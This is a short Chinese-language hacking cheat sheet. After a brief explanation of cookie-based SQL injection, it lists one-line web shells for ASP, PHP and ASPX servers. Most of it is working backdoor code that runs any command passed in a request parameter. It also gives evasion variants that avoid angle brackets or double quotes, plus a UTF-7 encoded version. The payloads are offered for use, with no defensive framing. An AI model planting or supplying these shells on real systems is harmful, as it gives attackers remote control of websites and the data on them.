cookie注入
- cookie注入其原理也和平时的注入一样,只不过说我们是将提交的参数已cookie方式提交了,而一般的注入我们是使用get或者post方式提交,get方式提交就是直接在网址后面加上需要注入的语句,post则是通过表单方式,get和post的不同之处就在于一个我们可以通过IE地址栏处看到我们提交的参数,而另外一个却不能。
常用一句话木马
-
asp一句话木马:
<%execute(request("value"))%>
-
php一句话木马:
<?php @eval($_POST[value]);?>
-
aspx一句话木马:
<%@ Page Language="Jscript"%><%eval(Request.Item["value"])%>
-
其他一句话木马:
<%eval request("value")%><%execute request("value")%><%execute(request("value"))%><%If Request("value")<>"" Then Execute(Request("value"))%><%if request ("value")<>""then session("value")=request("value"):end if:if session("value")<>"" then execute session("value")%><SCRIPT language=VBScript runat="server">execute request("value")</SCRIPT><%@ Page Language="Jscript"%><%eval(Request.Item["value"],"unsafe");%>
-
不用'<,>'的asp一句话木马:
<script language=VBScript runat=server>execute request("value")</script>
-
不用双引号的一句话木马:
<%eval request(chr(35))%>
-
UTF-7编码加密:
<%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
